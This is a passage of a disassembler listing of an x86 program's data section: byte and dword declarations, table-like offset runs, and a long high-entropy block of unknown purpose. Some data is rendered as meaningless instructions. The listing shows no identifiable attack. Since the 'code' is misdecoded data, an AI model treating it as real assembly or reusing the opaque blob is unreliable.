db 3Fh, 34h, 3Fh
db 4Bh ; K
db 3Fh, 54h, 3Fh
db 5Ah ; Z
db 3Fh, 66h, 3Fh
db 6Ch ; l
db 3Fh, 71h, 3Fh
db 7Eh ; ~
db 3Fh, 8Ah, 3Fh
db 8Fh ;
db 3Fh, 0D9h, 3Fh
db 0E2h ; â
db 3Fh, 0EEh, 3Fh
db 0F9h ; ù
db 3Fh, 2 dup(0)
db 0
db 30h, 2 dup(0)
db 28h ; (
align 4
a00a0s0e12u2u2k db ':0\0a0˜0e1]2“2ž2ª2Þ2ë2',0Dh,'3X3h3–3',0
align 4
db 0
aP_0 db 'P',0
align 10h
db 1Ch
align 4
db 74h ; t
db 37h, 79h, 37h
db 0CAh ; Ê
db 37h, 0E9h, 37h
db 8
db 38h, 0AAh, 38h
db 26h ; &
db 3Eh, 0B8h, 3Eh
db 0E5h ; å
db 3Eh, 1Eh, 3Fh
db 0
db 60h, 2 dup(0)
db 88h ; ˆ
align 10h
db 4Dh ; M
db 30h, 75h, 30h
db 7Fh ;
db 30h, 38h, 31h
db 40h ; @
db 31h, 5Ch, 31h
db 0F5h ; õ
db 31h, 1Eh, 32h
db 4Fh ; O
db 32h, 0A6h, 32h
db 22h ; "
db 33h, 48h, 33h
db 5Eh ; ^
db 33h, 84h, 33h
db 0
db 34h, 23h, 34h
db 3Ch ; <
db 34h, 54h, 34h
db 6Bh ; k
db 34h, 83h, 34h
db 0CEh ; Î
db 34h, 0CFh, 35h
db 0E4h ; ä
db 35h, 5Ch, 36h
db 71h ; q
db 36h, 0E5h, 36h
db 0F9h ; ù
db 36h, 12h, 37h
db 0D4h ; Ô
db 39h, 0F9h, 39h
db 3
db 3Ah, 0Eh, 3Ah
db 15h
db 3Ah, 1Ah, 3Ah
db 47h ; G
db 3Ah, 86h, 3Ah
db 0E3h ; ã
db 3Ah, 38h, 3Bh
db 64h ; d
db 3Bh, 7Fh, 3Bh
db 0A8h ; ¨
db 3Bh, 0D1h, 3Bh
db 0ECh ; ì
db 3Bh, 20h, 3Ch
db 63h ; c
db 3Ch, 6Ah, 3Ch
db 6Fh ; o
db 3Ch, 9Ch, 3Ch
db 0BDh ; ½
db 3Ch, 1Ah, 3Dh
db 75h ; u
db 3Dh, 0A9h, 3Dh
db 0EDh ; í
db 3Dh, 0F2h, 3Dh
db 3Ah ; :
db 3Eh, 65h, 3Eh
db 9Bh ; ›
db 3Eh, 0F0h, 3Eh
db 19h
db 3Fh, 4Dh, 3Fh
db 91h ; ‘
db 3Fh, 96h, 3Fh
db 0DEh ; Þ
db 3Fh, 2 dup(0)
db 0
db 70h, 2 dup(0)
db 6Ch ; l
db 1, 2 dup(0)
db 9
db 30h, 3Fh, 30h
db 94h ; ”
db 30h, 0BDh, 30h
db 0F1h ; ñ
db 30h, 4Ch, 31h
db 73h ; s
db 31h, 7Eh, 31h
db 8Ah ; Š
; ---------------------------------------------------------------------------
xor edx, ebx
xor edi, esi
xor dl, [eax+33h]
pop ebp
xor esp, [edx+33h]
stosb
xor al, 0B4h
xor al, 0BEh
xor al, 0C8h
xor al, 0D2h
xor al, 0DCh
xor al, 0F4h
xor al, 0FDh
xor al, 1Eh
xor eax, 35303524h
dec ebp
xor eax, 35703559h
jl short loc_41CAB7
xchg eax, ebx
xor eax, 35BF35A8h
retf
; ---------------------------------------------------------------------------
db 35h, 0F4h, 35h
dd 360D35F9h, 362A361Bh, 367B365Bh, 36B53695h, 36D436C9h
dd 3824379Eh, 3833382Eh, 3842383Dh, 38FA38EFh, 390438FFh
db 21h, 39h, 26h
; ---------------------------------------------------------------------------
loc_41CAB7: ; CODE XREF: .data:0041CA80�j
cmp [ecx+edi], edi
inc ecx
cmp [eax+463A3939h], eax
cmp cl, [edi+3Ah]
pop edi
cmp ch, [esi+3Ah]
jnb short near ptr loc_41CB01+3
cmp byte ptr [edx], 87h
cmp dl, [esi-55C564C6h]
cmp dh, [eax-3CC546C6h]
cmp ah, [esi]
cmp esi, [edx+3Bh]
cmp dword ptr [ebx], 0FFFFFFF4h
cmp al, 0FAh
cmp al, 0
cmp eax, 3D0C3D06h
adc bh, ds:3D1E3D18h
and al, 3Dh
sub bh, ds:3D363D30h
cmp al, 3Dh
inc edx
cmp eax, 3D4E3D48h
push esp
loc_41CB01: ; CODE XREF: .data:0041CAC8�j
cmp eax, 3D603D5Ah
cmp ax, 3D6Ch
jb short loc_41CB49
js short near ptr loc_41CB49+2
jle short near ptr loc_41CB4C+1
test ds:3D903D8Ah, bh
xchg eax, esi
cmp eax, 3DA23D9Ch
test al, 3Dh
scasb
cmp eax, 3DBA3DB4h
sar byte ptr ds:3DCC3DC6h, 0D2h
cmp eax, 3DDE3DD8h
in al, 3Dh
jmp far ptr 0FC3Dh:0F63DF03Dh
; ---------------------------------------------------------------------------
db 3Dh, 2, 3Eh
dd 3E0E3E08h, 3E1A3E14h, 3E263E20h
db 2Ch
; ---------------------------------------------------------------------------
loc_41CB49: ; CODE XREF: .data:0041CB0A�j
; .data:0041CB0C�j
db 3Eh
xor bh, [esi]
loc_41CB4C: ; CODE XREF: .data:0041CB0E�j
cmp [esi], bh
db 3Eh, 3Eh
inc esp
db 3Eh
dec edx
db 3Eh
push eax
db 3Eh
push esi
db 3Eh
pop esp
db 3Eh
bound edi, [esi]
push 743E6E3Eh
db 3Eh
jp short loc_41CBA2
cmp byte ptr [esi], 86h
; ---------------------------------------------------------------------------
db 3Eh
dd 3E923E8Ch, 3E9E3E98h, 3EAA3EA4h, 3EB63EB0h, 3EC23EBCh
dd 3ECE3EC8h, 3EDA3ED4h, 3EE63EE0h, 3EF23EECh, 3EFE3EF8h
dd 3F0A3F04h, 3F163F10h, 3F223F1Ch, 3F2E3F28h
; ---------------------------------------------------------------------------
xor al, 3Fh
loc_41CBA2: ; CODE XREF: .data:0041CB61�j
cmp bh, [edi]
inc eax
aas
inc esi
aas
dec esp
aas
; ---------------------------------------------------------------------------
dw 0
dd 8000h, 0B4h, 31993194h, 31C631C1h, 37CA3579h, 37D237CEh
dd 37DA37D6h, 37E237DEh, 37EA37E6h, 37F237EEh, 37FA37F6h
dd 380237FEh, 380A3806h, 3812380Eh, 381A3816h, 3822381Eh
dd 382A3826h, 3832382Eh, 383A3836h, 3842383Eh, 384A3846h
dd 3852384Eh, 385A3856h, 3862385Eh, 386A3866h, 3872386Eh
dd 387A3876h, 3882387Eh, 388A3886h, 3892388Eh, 389A3896h
dd 38A2389Eh, 38AA38A6h, 38B238AEh, 38BA38B6h, 38C238BEh
dd 38CA38C6h, 38D238CEh, 38DA38D6h, 38E238DEh, 38EA38E6h
dd 38F238EEh, 38FA38F6h, 390238FEh, 3D363906h, 9000h, 18h
dd 3F0A3D5Fh, 3F523F2Eh, 3F9A3F76h, 3FE23FBEh, 0A000h
dd 0E4h, 302A3006h, 305A303Ch, 307E306Ch, 30993085h, 30BD30ACh
dd 30E430D1h, 315130F5h, 319F3178h, 31ED31C6h, 323B3214h
dd 32893262h, 32C1329Fh, 32EC32D7h, 330732F3h, 3332331Dh
dd 335C3346h, 340A3371h, 347C3461h, 34B5349Ah, 352134CAh
dd 355A353Ch, 358A3575h, 35FC35E1h, 3635361Ah, 36A1364Ah
dd 36DA36BCh, 370F36F5h, 37873779h, 37C037A2h, 37E937CEh
dd 386837FEh, 38913876h, 38BD38AFh, 38ED38D8h, 39653957h
dd 399E3980h, 39C739ACh, 3A4639DCh, 3A6F3A54h, 3A9B3A8Dh
dd 3AD03AB6h, 3B3F3B1Dh, 3BCB3BBDh, 3C043BE6h, 3C2D3C12h
dd 3C8F3C42h, 3D2E3CB1h, 3D573D3Ch, 3D833D75h, 3DB33D9Eh
dd 3E223E00h, 3EAD3E9Fh, 3EE63EC8h, 3F243F0Fh, 3F933F71h
dd 0B000h, 24h, 301F3011h, 3058303Ah, 30813066h, 3227316Ah
dd 332432FFh, 336E3349h, 3379h, 0D000h, 70h, 315E3077h
dd 333532E9h, 33DB336Ch, 343D33E3h, 34F334CCh, 3647356Fh
dd 36C43650h, 36F536CDh, 374E36FEh, 37D1378Bh, 3832380Dh
dd 38483842h, 385A3853h, 386A3865h, 389B388Dh, 38C538AEh
dd 398238FAh, 3D8E3D7Bh, 3E0D3DF6h, 3E433E28h, 3E783E5Eh
dd 3EA43E8Dh, 3ED63EC3h, 3F4D3EE6h, 3F733F55h, 3FA43F97h
dd 0E000h, 3Ch, 30CD30BAh, 31513145h, 31933181h, 31D431A4h
dd 324D31E6h, 32733255h, 32A43297h, 34753470h, 37B13607h
dd 386B37C6h, 387E3879h, 3C02390Eh, 3EF33E99h, 0F000h
dd 18h, 32023000h, 34983493h, 387A3672h, 3CE8392Dh, 10000h
dd 44h, 33143307h, 33313329h, 3356333Bh, 3386335Eh, 33A1338Ch
dd 33CD33AEh, 33F133E4h, 36B336ABh, 3898383Ch, 38E738B2h
dd 3970391Ch, 3B1E3A9Bh, 3EEC3BCCh, 3F003EF6h, 3F0Ah, 11000h
dd 210h, 304F303Eh, 30793064h, 30963090h, 30A2309Ch, 316C3164h
dd 317E3175h, 318F3189h, 31A33195h, 31BC31B4h, 31C831C2h
dd 31E731D6h, 31F531EFh, 320931FBh, 3222321Ah, 322E3228h
dd 324D323Ch, 325B3255h, 326F3261h, 32883280h, 3294328Eh
dd 32B332A2h, 32C132BBh, 32D532C7h, 32EE32E6h, 32FA32F4h
dd 33193308h, 33273321h, 333B332Dh, 3354334Ch, 3360335Ah
dd 337F336Eh, 338D3387h, 33A13393h, 33BA33B2h, 33C633C0h
dd 33E533D4h, 33F333EDh, 340733F9h, 34203418h, 342C3426h
dd 344B343Ah, 34593453h, 346D345Fh, 3486347Eh, 3492348Ch
dd 34B134A0h, 34BF34B9h, 34D334C5h, 34F134E9h, 34FD34F7h
dd 3521350Bh, 352F3529h, 35433535h, 35613559h, 356D3567h
dd 3591357Bh, 359F3599h, 35B335A5h, 35D135C9h, 35DD35D7h
dd 360135EBh, 360F3609h, 36233615h, 36413639h, 364D3647h
dd 3671365Bh, 367F3679h, 36933685h, 36B136A9h, 36BD36B7h
dd 36E136CBh, 36EF36E9h, 370336F5h, 37213719h, 372D3727h
dd 3751373Bh, 375F3759h, 37733765h, 37913789h, 379D3797h
dd 37C137ABh, 37CF37C9h, 37E337D5h, 380137F9h, 380D3807h
dd 3831381Bh, 383F3839h, 38533845h, 38713869h, 387D3877h
dd 38A1388Bh, 38AF38A9h, 38C338B5h, 38E138D9h, 38ED38E7h
dd 391138FBh, 391F3919h, 39333925h, 39513949h, 395D3957h
dd 3981396Bh, 398F3989h, 39A33995h, 39C139B9h, 39CD39C7h
dd 39F139DBh, 39FF39F9h, 3A133A05h, 3A313A29h, 3A3D3A37h
dd 3A613A4Bh, 3A6F3A69h, 3A833A75h, 3AA13A99h, 3AAD3AA7h
dd 3AD13ABBh, 3ADF3AD9h, 3AF33AE5h, 3B113B09h, 3B1D3B17h
dd 3B413B2Bh, 3B4F3B49h, 3B633B55h, 3B813B79h, 3B8D3B87h
dd 3BB13B9Bh, 3BC33BBAh, 3BD53BCCh, 3BE23BDBh, 3BF03BE9h
dd 12000h, 18h, 300A3004h, 30163010h, 3022301Ch, 302E3028h
dd 14000h, 0E8h, 31713161h, 31953191h, 319D3199h, 31A531A1h
dd 31AD31A9h, 31B531B1h, 31BD31B9h, 31C531C1h, 31CD31C9h
dd 31D531D1h, 31DD31D9h, 31E531E1h, 31ED31E9h, 31F531F1h
dd 31FD31F9h, 32053201h, 320D3209h, 32153211h, 321D3219h
dd 32253221h, 322D3229h, 32353231h, 323D3239h, 32453241h
dd 324D3249h, 32553251h, 325D3259h, 32653261h, 326D3269h
dd 32753271h, 327D3279h, 32853281h, 328D3289h, 32953291h
dd 329D3299h, 32A532A1h, 32AD32A9h, 32B532B1h, 32BD32B9h
dd 32C532C1h, 32CD32C9h, 32D532D1h, 32DD32D9h, 37483744h
dd 3750374Ch, 381B3754h, 3823381Fh, 382B3827h, 3833382Fh
dd 39C73837h, 39CF39CBh, 39D739D3h, 39DF39DBh, 39E739E3h
dd 39EF39EBh, 39F3h, 18000h, 84h, 35473543h, 354F354Bh
dd 35573553h, 355F355Bh, 35673563h, 357B356Bh, 3583357Fh
dd 358B3587h, 3593358Fh, 359B3597h, 35A3359Fh, 35AB35A7h
dd 35B335AFh, 35BB35B7h, 35CF35CBh, 35D735D3h, 35DF35DBh
dd 384B35E3h, 3853384Fh, 385B3857h, 3863385Fh, 386B3867h
dd 3873386Fh, 387B3877h, 3883387Fh, 388B3887h, 3893388Fh
dd 389B3897h, 38A3389Fh, 38AB38A7h, 38AFh, 19000h, 3Ch
dd 3DE83DE0h, 3DF43DECh, 3E903E00h, 3E983E94h, 3EB43EB0h
dd 3EBC3EB8h, 3ED43ED0h, 3EDC3ED8h, 3FDB3EE0h, 3FE33FDFh
dd 3FEB3FE7h, 3FF33FEFh, 3FF7h, 1A000h, 110h, 3022301Eh
dd 302A3026h, 3036302Eh, 303E303Ah, 30463042h, 3052304Eh
dd 305A3056h, 3066305Eh, 306E306Ah, 30763072h, 3082307Eh
dd 308A3086h, 3096308Eh, 309E309Ah, 30A630A2h, 30B230AEh
dd 30BA30B6h, 30C630BEh, 30CE30CAh, 30D630D2h, 30E230DEh
dd 30EA30E6h, 30F630EEh, 30FE30FAh, 31063102h, 3112310Eh
dd 311A3116h, 3126311Eh, 312E312Ah, 31363132h, 3142313Eh
dd 31B931B5h, 31C131BDh, 31D031C5h, 31DC31D8h, 31E831E4h
dd 31F431F0h, 320031FCh, 320C3208h, 32183214h, 32243220h
dd 3238322Ch, 3240323Ch, 32C432C0h, 330032FCh, 33083304h
dd 3320330Ch, 33283324h, 3330332Ch, 33503334h, 33583354h
dd 3360335Ch, 33683364h, 3370336Ch, 33943390h, 339C3398h
dd 33C033A0h, 33C833C4h, 33F033CCh, 33F833F4h, 343033FCh
dd 34383434h, 3440343Ch, 367F3444h, 36873683h, 368Bh, 26h dup(0)
dd 89E9272Eh, 7268C35Eh, 55448846h, 38E0E277h, 4D8EA8D8h
dd 43239604h, 838D28BDh, 338FA971h, 2E88D979h, 0ACE28691h
dd 8ED18738h, 2EF44A15h, 238DAE59h, 88D682A8h, 0E2B9BC0Ah
dd 420D389Eh, 0F6C16E8Eh, 2FB84723h, 0DD06DF88h, 393834E2h
dd 62358E23h, 0C46A23CCh, 12CF88F1h, 38DCE2C1h, 228E85EBh
dd 0C9238F9Eh, 0C08871A1h, 9BE290F0h, 8EAA5338h, 2301F189h
dd 888BE1D4h, 0E24E8CEDh, 8E6F38ABh, 0EF76BCD8h, 0D0E73ECDh
dd 0E2E6540Dh, 0DBF23852h, 927BBB89h, 0B7B6C383h, 69CA2F88h
dd 0D938A9E2h, 0CD78E39h, 236123D3h, 0AD1E88A7h, 38B4E2A2h
dd 50A7C399h, 407307Ch, 0F6130705h, 0C271B77Fh, 16C42746h
dd 1CAC71A7h, 47D07625h, 11501386h, 0C4DCF756h, 84711A55h
dd 0E151091Ch, 7A25BE47h, 13EF9111h, 0D98412C7h, 901204A9h
dd 71EA8167h, 0D2D260B3h, 574E862h, 98C6C004h, 243AB0FDh
dd 9C6A365h, 3A8276DFh, 32C09A08h, 76B09202h, 5A80A024h
dd 82786609h, 41E4DD4Eh, 60D6B08Ah, 0B0D1BF02h, 3836283Ah
dd 0D542E96h, 0C6430A3Ah, 356209D6h, 98BE6202h, 181EAE40h
dd 24262AB0h, 0D70B06F7h, 773A02ECh, 0BD26406Ch, 2E62B843h
dd 9167532h, 228237D4h, 0FAC0269Bh, 32B0FA70h, 7213F926h
dd 294B109h, 40485ABEh, 0B0F27ABAh, 0D0E4240Eh, 8B470BEEh
dd 303C2A82h, 84A5CAC0h, 4124A6B0h, 6092E54h, 0C5F602DFh
dd 45C24023h, 2616B819h, 9965BA3h, 5A0B3D68h, 0AA02DF0Bh
dd 2AE0F321h, 1290AE31h, 0EEA23E26h, 2821609h, 606395BAh
dd 0B0015B26h, 834D2442h, 2E910986h, 0D9B55283h, 511FA2CFh
dd 9B534A40h, 632CAAB0h, 3B095E7Ch, 3F6A82A6h, 0D6CA40EBh
dd 25F2A0A5h, 2C0E90BEh, 0B2E16A7h, 92040C0Fh, 0B2D4C735h
dd 76436123h, 0C6C0C0D2h, 32B08CAFh, 0FA3A8024h, 82F5920Bh
dd 0E073812Ah, 902C273Ah, 25762632h, 0BE709FAh, 0BB7B6E02h
dd 4EE97260h, 0F12E9690h, 9F09FE89h, 0A9F6836Bh, 0C4B2D753h
dd 996A406Ah, 7BE2B8B4h, 0E1838097h, 0E6171A94h, 0BDC83E03h
dd 450E8998h, 97309261h, 4CC9E2B3h, 2F164EF4h, 0CB5A05B6h
dd 0FFC28166h, 0EA1E70CCh, 12C69558h, 7E0403EDh, 0DA8156F7h
dd 4660D4E1h, 0AE1C481Bh, 31EAD12h, 0E2D70CBAh, 60FB2B89h
dd 0C34C1DEAh, 8E1917BAh, 0B5C2BA04h, 0E9896AC1h, 58121A30h
dd 7E0EEACFh, 20257DBFh, 64C681BAh, 840E70EAh, 13227758h
dd 0AA05396Dh, 6A81AF6Ah, 2E3033D1h, 0AED0B7A1h, 0BB62CE1Ch
dd 5EEC375Eh, 8281FB0Bh, 40793D02h, 0B00951D2h, 0ADDC2E3Ah
dd 242D0B7Eh, 0CDA44602h, 0F99D1EC0h, 0EE268271h, 860BFAD8h
dd 0AE6202E5h, 0CD0AE0C5h, 26B698B9h, 0BC24D04h, 4A824455h
dd 0E60080Ah, 46B88613h, 0F6606FA2h, 4080A1D3h, 263EB81Dh
dd 772AA34h, 12B0ED8Ch, 0B6E206B3h, 88C24377h, 0E23BB22Ah
dd 4ED25C52h, 2410B0Eh, 0D87B8B23h, 70A08889h, 11584FBAh
dd 1E67249Ah, 0C2469D38h, 0B8C0BBBBh, 90B497FCh, 2028B604h
dd 0F67F6AC0h, 5C78E248h, 2E0EBE60h, 7254CFFh, 4B7E8096h
dd 0C7E22B5Ch, 16BEB14Ch, 203AB6Fh, 89F59E0Dh, 0BA309CBBh
dd 4A5238F2h, 51BF397h, 0C15FA622h, 609359FAh, 0A5CBC1Eh
dd 823A264Ah, 8919CB9h, 0BD85FE4Eh, 8249018Bh, 0C0EE6122h
dd 0B02D7CDAh, 4FB22ED2h, 8F420756h, 3BDB1272h, 47B83AC0h
dd 481CBF71h, 2C47AE87h, 0E311C06Dh, 57C43C46h, 2C76B8D6h
dd 967A3E85h, 7DBE0569h, 9466C164h, 49A2602Ah, 96C6CE38h
dd 1203CB17h, 89BD2FCAh, 0E670FCC3h, 0DE97585Ch, 5055E17h
dd 817AD0E2h, 0E7AC8796h, 647F8ED0h, 0D55CBAE2h, 1AA80E76h
dd 4BB72326h, 0EB989BEh, 3860CE70h, 0F88ED5A7h, 2223365Ah
dd 11881B28h, 0DEE27514h, 17CA3F58h, 0A9052979h, 0FA8188AAh
dd 0D9EB3C33h, 66604C5Fh, 0CA0238B6h, 35B8968Eh, 0C4DA5823h
dd 43B09C88h, 1758FCE2h, 551A173Eh, 1FF68603h, 8A1C8859h
dd 5C38E2B2h, 0AC0E527Dh, 1825CF57h, 0F466C0C7h, 69E2538Dh
dd 0B7E63ABAh, 0F51CE2B8h, 5647ADC4h, 0DA11E39Fh, 0D5C4EA72h
dd 2C16B87Eh, 0BE6154Ah, 0CA25229Eh, 4E96C012h, 61E35F58h
dd 0E5EE6067h, 170E995Ch, 1E053439h, 0B2806EC1h, 0E2325044h
dd 62DE5C5Dh, 3687217h, 0CD6526C6h, 0DABC9388h, 0DB3803E2h
dd 0F8C68EBAh, 0C8FA259Eh, 0A8824EC0h, 38CFE26Eh, 5097702Bh
dd 0EB320540h, 75A6C0DCh, 8AE293FEh, 8EDF3238h, 2329A48Dh
dd 881CCA4Ch, 0E2D71014h, 0B4213873h, 0D4F0CC8Eh, 8AD30923h
dd 515DF38Fh, 390FE289h, 8E193848h, 231A6F9Ah, 88949DE0h
dd 0E2C7368Fh, 0C94238E6h, 0D24AEC8Eh, 7F5EFD23h, 70C1AB89h
dd 0E00ED8CAh, 4375BC32h, 90F3EC21h, 0E4C62043h, 0F4B339C9h
dd 0DBDA030Eh, 7B028B43h, 0FBE22B90h, 9E39FAE4h, 0C9EC0EC8h
dd 0D409434Ah, 186B90D3h, 769FE4E6h, 390EE41Eh, 380E4598h
dd 0D2437DB2h, 0B790E8A6h, 57E44B26h, 0ED63C39h, 4332938Ah
dd 90D882EEh, 0E4FD5298h, 377B31D4h, 0C871BB04h, 0F1725B97h
dd 0E147831Ch, 30243C87h, 0F51E221h, 72BAC6C8h, 4AF31CF8h
dd 0BF48871Bh, 0D702187h, 0B0B3C8FAh, 0DE1C0672h, 0FD873F75h
dd 20215ED2h, 31C8BA7Dh, 1CAE7266h, 845B3AA3h, 0F28A591Ch
dd 0CD930E00h, 1AE043BCh, 0AE2C909Dh, 39ABE46Dh, 0C70EC17Fh
dd 0B943B12Bh, 0A0900EBEh, 10E480E0h, 0E5D8A39h, 43D23B52h
dd 90D564BAh, 0E4A0D888h, 84E739A5h, 75FE80Eh, 141B1143h
dd 0B52CC290h, 0FC39B4E4h, 31271E90h, 80650E79h, 732A42A3h
dd 0EBFF70B2h, 284C07CAh, 72A0541Ch, 0CA748192h, 1C283607h
dd 3872A051h, 7CAB081h, 5A1C28BDh, 81FC79A0h, 6207CA60h
dd 0A0961C28h, 42816C72h, 28F707CAh, 72A0101Ch, 0CA28817Ch
dd 1C282707h, 1372A08Ch, 7CA9581h, 0C71C289Ch, 812472A0h
dd 3B07CA46h, 0A0701C28h, 0E381CA72h, 288507CAh, 72A0CB1Ch
dd 0CAD08111h, 1C289307h, 0A672A0B8h, 7E68381h, 0FF1C2820h
dd 819F72A0h, 0C307CA77h, 0A0CC1C28h, 6F810372h, 280807CAh
dd 72A0BF1Ch, 0CAE78140h, 1C282B07h, 7972A0E2h, 7CA0C81h
dd 821C28AAh, 814172A0h, 0EA07CA3Ah, 0A0B91C28h, 9A81E472h
dd 28A407CAh, 72A0971Ch, 0CADA817Eh, 1C287A07h, 6672A017h
dd 7CA9481h, 1D1C28A1h, 813D72A0h, 0DE07CAF0h, 0A0B31C28h
dd 72810B72h, 28A707CAh, 72A01C1Ch, 0CAD181EFh, 1C285307h
dd 8F72A03Eh, 7CA3381h, 5F1C2826h, 81EC72A0h, 2A07CA76h
dd 0A0491C28h, 8804CAF3h, 2140795Dh, 94C403E5h, 39501A0Eh
dd 0E5D940EBh, 0E94C503h, 9939B039h, 3E5CD40h, 310E94ADh
dd 408B3950h, 1803E501h, 50230E94h, 1F40DD39h, 944E03E5h
dd 39502D0Eh, 0E54840F9h, 0E944F03h, 653950F2h, 3E58E40h
dd 5C0F9478h, 405839B0h, 8D03E519h, 50E50E94h, 57409839h
dd 946703E5h, 0F2BA7F08h, 7CA6481h, 631C28AFh, 81B672A0h
dd 0F507CAFEh, 0A0B71C28h, 0A5813C72h, 28CE07CAh, 72E0E91Dh
dd 0CA448168h, 1C28E007h, 4372A04Dh, 0ECA6981h, 2E72A0DCh
dd 7CAAC81h, 591C2815h, 81A872A0h, 9E07CA0Ah, 0A06E1C28h
dd 0DF814772h, 283407CAh, 72A0351Ch, 0CACF816Ah, 1C28DC07h
dd 0C972A022h, 7CAC081h, 891C289Bh, 81D472A0h, 0AB07CAEDh
dd 60121D28h, 0D07EEEDh, 0A0521C28h, 281BB72h, 282F07CAh
dd 72A0A91Ch, 0CA6181D7h
dd 1C281E07h, 5072A0B4h, 7CA0481h, 0C21C58F6h, 811672A0h
dd 8607CA25h, 0A0561C28h, 9815572h, 28BE07CAh, 0D99B911Ch
dd 43909A86h, 43719A13h, 0C3D29AEBh, 73059BD3h, 0C7985876h
dd 3B655873h, 0C7DF4873h, 3B084C73h, 33025873h, 77A05873h
dd 5B664873h, 4FDD4C73h, 8BB04873h, 3BF4C73h, 3B365873h
dd 97545173h, 3B7143CDh, 0D74762CDh, 6387BE34h, 0AF871E34h
dd 2B872435h, 7C7D734h, 3B877735h, 2787BD34h, 63C73235h
dd 17C7D435h, 23C79B34h, 0FB877035h, 3387F935h, 73C7B134h
dd 0BF875A34h, 0BB877A34h, 0F87E435h, 0EF854734h, 2B872C85h
dd 0CB87A535h, 0A7874135h, 2F870634h, 0F787C534h, 0C3874534h
dd 17C7A335h, 97C76834h, 5B871534h, 0ABC72135h, 2BC73135h
dd 13873E34h, 0EFC71634h, 0BB879534h, 27C75B34h, 43874D35h
dd 87879134h, 53C7B534h, 0D7871F35h, 4B875334h, 0AB876335h
dd 5F873B35h, 6BC73F34h, 0CB87D634h, 0F31C2535h, 0F1CA7D2h
dd 2F1C0FD6h, 931C35D6h, 371C23D2h, 797748FBh, 73C7AF58h
dd 73338058h, 73FB9248h, 732B815Ch, 733B275Ch, 73337648h
dd 73FBE74Ch, 736F7B48h, 7373E94Ch, 7397F148h, 73FF9F5Ch
dd 73F7A94Ch, 73BFC448h, 736B9948h, 73E3975Ch, 6BCC8341h
dd 5C1873E6h, 1C733FC8h, 0D698450Eh, 0C7931C6Eh, 34B3F4C9h
dd 354FC72Fh, 355B87CBh, 35C387FFh, 351FC7EAh, 34C787EDh
dd 347F87F7h, 35DB87E1h, 3447871Bh, 34AF87ADh, 31BB870Ch
dd 0CDE2FB2Bh, 0CDEB611Dh, 0CDBB3119h, 0CDBB71C2h, 0CD6B3189h
dd 0CD1B3112h, 0CCEB617Eh, 7D73BA20h, 73C76458h, 730F845Ch
dd 73236D58h, 73AB6A4Ch, 736BD158h, 732FA14Ch, 739FCE5Ch
dd 0BB733777h, 735FFB58h, 73033D5Ch, 73D35148h, 733BDC58h
dd 737F2D5Ch, 7347A458h, 731F9D58h, 82D8EE1Ch, 0FB1C86D3h
dd 631CAED6h, 0B1CCDD7h, 0B71C04D3h, 0C31C55D3h, 4B1C0AD7h
dd 0F1C13D3h, 471C30D7h, 0F71CD3D6h, 5C7340D0h, 4C733F34h
dd 1C73738Ch, 0D7B006B3h, 0C7B71C6Ch, 3173B22Ah, 0CD3BD252h
dd 0CC4F710Bh, 2737B8Bh, 0D8A0881Ch, 0BB1C4FD7h, 9B1C67D6h
dd 571646D3h, 73FDE11Ch, 0FC90B41Ch, 0B71C28D7h, 6B1C7FD3h
dd 486078C7h, 0BFC72E35h, 4C960731h, 7F614BCDh, 73B1C7CCh
dd 0BF6F4C2Bh, 30D5873h, 9CBB1C73h, 1CF2D3F5h, 1BF3C7BBh
dd 0C7A6354Ah, 0C7593523h, 87BC35FBh, 0EF3A321Fh, 91400178h
dd 18540FEh, 40614940h, 2D407CEEh, 424F40B2h, 40DB8F40h
dd 4740B83Bh, 2C874048h, 40E36D40h, 0D6405746h, 293E4085h
dd 407D6940h, 2A409464h, 17CE4049h, 40CACB40h, 0FC40C32Fh
dd 5E97405Ch, 40D00540h, 0AC40877Ah, 0BA7F408Eh, 40A8D540h
dd 4B40B71Ah, 600E40B9h, 40F8A740h, 2840225Ah, 0DE144011h
dd 40793F40h, 8840AA29h, 5F3C4033h, 40B64C40h, 0B8409602h
dd 9CDA4058h, 40FCB040h, 55401A17h, 1C1F40F6h, 40388A40h
dd 5740AC7Dh, 0F4C74018h, 44698D40h, 0F580B774h, 9F5680C4h
dd 8072DA80h, 4A807ED5h, 229E8015h, 8012A280h, 0E880584Eh
dd 99E58007h, 80343980h, 44806EC1h, 0DE5D8050h, 80687280h
dd 93806526h, 0DB0380BCh, 80F8C680h, 8280C8FAh, 2BCF80A8h
dd 80405080h, 7580DCEBh, 328A80FEh, 80A48D80h, 1480CA4Ch
dd 21738010h, 80F0CC80h, 0FA83D309h, 0FE2025Dh, 9A10110Eh
dd 9DE0106Fh, 10368F10h, 0EC1042E6h, 5EFD104Ah, 10C1AB10h
dd 8F4EE0D8h, 9ED01610h, 9C3431A3h, 0E40C7210h, 0D9BF0124h
dd 0ED90A745h, 0FFA89151h, 40D210C3h, 9229083h, 0FB02D2C0h
dd 2043292Bh, 8D32086h, 24010C2Bh, 50712048h, 929D013h
dd 325A4801h, 0C9E57D01h, 6BCF569h, 77EF36D3h, 93F5591Ch
dd 0ED789BF1h, 4D7A98AFh, 3E75DDFDh, 4268C2A6h, 68224827h
dd 9E345B0Bh, 26345C63h, 190432Ah, 746F6205h, 0C8E6668h
dd 5672751Ah, 0C7E6D76Fh, 0B72A709Fh, 6C702F52h, 2A445351h
dd 312E1305h, 7F540B76h, 6269276Fh, 0E34FFDDEh, 0C9797A61h
dd 12D37567h, 0C9F8E9Ah, 970992DBh, 0A4129D89h, 0BE48B324h
dd 12BC791h, 6A0C5101h, 334FBD76h, 0DB08A2C4h, 0A1C561C4h
dd 918A4F2h, 0BF9C07Ch, 0DF9EEB88h, 3E211123h, 8A3052EFh
dd 246418F7h, 423BE372h, 0F3883078h, 0E718817Eh, 578EEF1Ch
dd 0DB2B9C2Ah, 4A4B6448h, 0C75B18B9h, 7D56C488h, 0B529780Eh
dd 0C8B96718h, 0C13CE473h, 6256448Ah, 0A2301195h, 9F7693DEh
dd 9341B59h, 4714C8FAh, 504B5406h, 4F106761h, 0A1CCF841h
dd 0FF214520h, 8B73FE42h, 8F92770Ah, 0EF36C6AFh, 25CA7D64h
dd 0EF325AB3h, 2467095Fh, 94894F6Fh, 0C7A3E283h, 0CC014F0h
dd 1C10D0CDh, 11CA1018h, 38640C20h, 0A4E49048h, 1AEDF048h
dd 0C648D617h, 50531148h, 8742918h, 65540894h, 5C91F0E7h
dd 19D2D40Ah, 0BF3077F4h, 88BEE014h, 2DBFE41Dh, 5DD7154h
dd 0DB41A01Ah, 0D5407850h, 21423E8h, 81D63958h, 0D0099903h
dd 351FE451h, 0A08E0B4Eh, 8C61808Ch, 919509C8h, 2EAD22A1h
